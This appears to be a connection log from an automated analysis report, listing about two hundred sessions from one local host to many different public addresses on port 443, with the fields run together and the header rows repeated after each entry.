                                            18568192.168.2.2333562117.166.232.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18569192.168.2.2353082198.194.103.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18570192.168.2.233375817.124.202.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18571192.168.2.233772463.130.53.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18572192.168.2.2353466221.14.251.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18573192.168.2.2359632131.27.11.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18574192.168.2.2337628154.247.0.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18575192.168.2.234335047.232.58.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18576192.168.2.235749484.99.2.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18577192.168.2.2339816104.147.111.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18578192.168.2.235619490.105.157.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18579192.168.2.2345994168.86.50.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18580192.168.2.2340818126.37.230.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18581192.168.2.234068694.58.86.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18582192.168.2.2349052119.13.189.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18583192.168.2.2349728197.210.54.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18584192.168.2.2355134111.73.181.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18585192.168.2.2350540102.148.181.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18586192.168.2.236040453.199.115.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18587192.168.2.236042260.182.128.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18588192.168.2.233882463.26.233.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18589192.168.2.2351504149.217.155.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18590192.168.2.2360874139.147.198.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18591192.168.2.2347738199.253.62.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18592192.168.2.234481638.32.184.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18593192.168.2.234215662.185.35.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18594192.168.2.2338502129.106.77.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18595192.168.2.2337226164.73.239.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18596192.168.2.235611443.215.13.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18597192.168.2.234708848.72.212.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18598192.168.2.2345804120.2.212.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18599192.168.2.2352320191.223.176.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18600192.168.2.2337890117.21.153.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18601192.168.2.2332854222.184.92.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18602192.168.2.2346764204.94.5.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18603192.168.2.235398454.139.190.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18604192.168.2.2354228152.227.220.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18605192.168.2.236003012.88.126.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18606192.168.2.233306624.4.161.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18607192.168.2.234936432.247.220.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18608192.168.2.2350112151.158.172.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18609192.168.2.2360126117.217.206.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18610192.168.2.2357830111.159.54.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18611192.168.2.2349174112.19.4.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18612192.168.2.2334256205.20.180.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18613192.168.2.23343601.215.66.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18614192.168.2.2337450196.49.226.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18615192.168.2.2348662113.44.11.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18616192.168.2.2349998117.35.128.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18617192.168.2.2350404111.164.235.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18618192.168.2.2355458112.34.149.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18619192.168.2.233315045.199.10.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18620192.168.2.2344034156.95.246.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18621192.168.2.233887499.26.215.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18622192.168.2.2349366151.238.204.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18623192.168.2.2332954208.190.236.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18624192.168.2.2350976143.154.5.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18625192.168.2.2358464109.80.2.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18626192.168.2.2347788111.235.22.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18627192.168.2.2348480188.79.23.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18628192.168.2.2336246200.87.122.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18629192.168.2.234368643.54.65.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18630192.168.2.2336966126.99.155.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18631192.168.2.234916839.71.183.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18632192.168.2.234001241.31.165.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18633192.168.2.2340588128.245.130.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18634192.168.2.2357510147.235.122.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18635192.168.2.2340594144.191.92.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18636192.168.2.23484568.185.231.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18637192.168.2.23444309.102.239.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18638192.168.2.233280490.39.72.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18639192.168.2.2339702126.71.68.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18640192.168.2.235855235.184.30.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18641192.168.2.2341696141.167.99.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18642192.168.2.23499324.178.190.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18643192.168.2.2353350145.49.175.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18644192.168.2.234918837.70.75.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18645192.168.2.2354454120.103.220.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18646192.168.2.2358418142.23.138.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18647192.168.2.233536842.119.136.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18648192.168.2.2357098204.196.174.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18649192.168.2.2338450142.10.196.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18650192.168.2.234417873.165.240.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18651192.168.2.2354942207.238.88.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18652192.168.2.2350264138.125.118.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18653192.168.2.2346696143.248.78.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18654192.168.2.2351500139.208.180.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18655192.168.2.234783888.83.194.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18656192.168.2.2347448142.218.19.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18657192.168.2.233499038.235.200.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18658192.168.2.233564881.196.233.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18659192.168.2.2335660201.227.171.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18660192.168.2.2349630191.177.121.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18661192.168.2.2333376104.242.168.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18662192.168.2.2344430200.226.241.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18663192.168.2.233763048.202.140.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18664192.168.2.2359822101.198.140.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18665192.168.2.233610284.23.112.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18666192.168.2.2357732102.17.198.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18667192.168.2.2342592107.228.57.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18668192.168.2.235626019.94.233.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18669192.168.2.2345010108.212.134.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18670192.168.2.2358594202.166.156.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18671192.168.2.2335724125.155.139.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18672192.168.2.2346158194.62.167.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18673192.168.2.2348166133.204.90.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18674192.168.2.2340574125.125.5.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18675192.168.2.234803038.187.46.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18676192.168.2.2351932113.72.175.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18677192.168.2.2351690121.228.94.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18678192.168.2.234193435.252.168.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18679192.168.2.2340560129.27.45.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18680192.168.2.235025089.13.190.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18681192.168.2.2334592212.244.143.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18682192.168.2.2345790117.220.145.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18683192.168.2.2359250221.75.78.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18684192.168.2.2341720103.236.125.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18685192.168.2.2349032159.98.197.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18686192.168.2.2351112188.191.46.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18687192.168.2.23329842.162.225.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18688192.168.2.234825044.118.12.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18689192.168.2.233966099.114.164.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18690192.168.2.234394483.229.158.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18691192.168.2.233457824.59.187.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18692192.168.2.2336260135.105.129.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18693192.168.2.2345316143.239.208.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18694192.168.2.235006683.99.99.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18695192.168.2.235152825.204.253.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18696192.168.2.23395961.92.155.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18697192.168.2.2346580103.248.39.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18698192.168.2.233514063.48.221.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18699192.168.2.2336618153.142.15.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18700192.168.2.2360640116.182.87.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18701192.168.2.2347674203.231.125.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18702192.168.2.2345504133.55.250.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18703192.168.2.235565020.45.91.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18704192.168.2.2352950125.206.107.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18705192.168.2.235020298.181.180.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18706192.168.2.234402218.97.21.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18707192.168.2.236061062.23.102.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18708192.168.2.2344132148.152.25.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18709192.168.2.233492472.125.81.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18710192.168.2.233499675.194.229.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18711192.168.2.2345622138.170.18.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18712192.168.2.2344774197.29.65.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18713192.168.2.2358318156.92.217.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18714192.168.2.2342964165.227.186.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18715192.168.2.234213235.5.185.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18716192.168.2.2346796192.90.144.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18717192.168.2.2346290162.11.24.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18718192.168.2.2358308201.167.49.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18719192.168.2.2338490211.198.160.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18720192.168.2.234259885.234.63.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18721192.168.2.2341786153.155.75.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18722192.168.2.2337924129.129.230.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18723192.168.2.234392437.15.109.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18724192.168.2.235036890.200.124.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18725192.168.2.2336354105.48.68.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18726192.168.2.233422842.61.242.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18727192.168.2.233710237.7.232.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18728192.168.2.2360350174.119.41.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18729192.168.2.235865270.41.88.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18730192.168.2.2360152223.57.33.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18731192.168.2.236012268.79.138.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18732192.168.2.234330423.44.219.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18733192.168.2.2356918174.56.20.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18734192.168.2.233776443.151.96.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18735192.168.2.2340104147.151.178.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18736192.168.2.2332958130.238.83.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18737192.168.2.2334082120.8.0.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18738192.168.2.235779893.103.203.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18739192.168.2.2333194122.117.29.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18740192.168.2.235628834.75.86.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18741192.168.2.2352734172.84.131.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18742192.168.2.233868420.7.194.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18743192.168.2.2334734157.184.162.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18744192.168.2.2358880205.151.91.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18745192.168.2.2352532197.251.60.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18746192.168.2.235897876.39.196.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18747192.168.2.2344866167.140.0.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18748192.168.2.23568304.154.39.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18749192.168.2.2359090212.107.70.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18750192.168.2.2335430158.185.96.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18751192.168.2.233497887.157.83.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18752192.168.2.2334232150.129.192.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18753192.168.2.2353420116.188.150.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18754192.168.2.2341618102.57.213.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18755192.168.2.2359768222.158.137.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18756192.168.2.2341422146.27.126.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18757192.168.2.2347506120.51.244.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18758192.168.2.235870887.212.211.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18759192.168.2.2360732163.199.46.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18760192.168.2.2333088151.250.47.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18761192.168.2.2337970128.248.193.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18762192.168.2.2356082202.218.200.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18763192.168.2.235709049.163.84.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18764192.168.2.2337284183.86.233.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18765192.168.2.2340492125.19.28.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18766192.168.2.2354994167.162.235.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18767192.168.2.234273885.134.187.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18768192.168.2.233497643.123.79.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18769192.168.2.2346096172.36.129.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18770192.168.2.2344334136.30.248.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18771192.168.2.234293235.218.107.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18772192.168.2.233280867.42.220.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18773192.168.2.2344092222.148.109.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18774192.168.2.2339812147.248.158.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18775192.168.2.235983851.94.37.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18776192.168.2.2335258179.211.131.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18777192.168.2.234518435.85.23.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18778192.168.2.2341284143.252.53.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18779192.168.2.2359094108.1.183.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18780192.168.2.2346844191.115.38.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18781192.168.2.235277492.177.246.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18782192.168.2.2355206174.177.118.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18783192.168.2.2350140126.72.194.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18784192.168.2.233357292.134.215.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18785192.168.2.2343574158.170.80.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18786192.168.2.233720019.158.118.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18787192.168.2.2346384151.134.98.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18788192.168.2.2335202115.225.244.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18789192.168.2.234923041.164.56.254443
                                            TimestampBytes transferredDirectionData


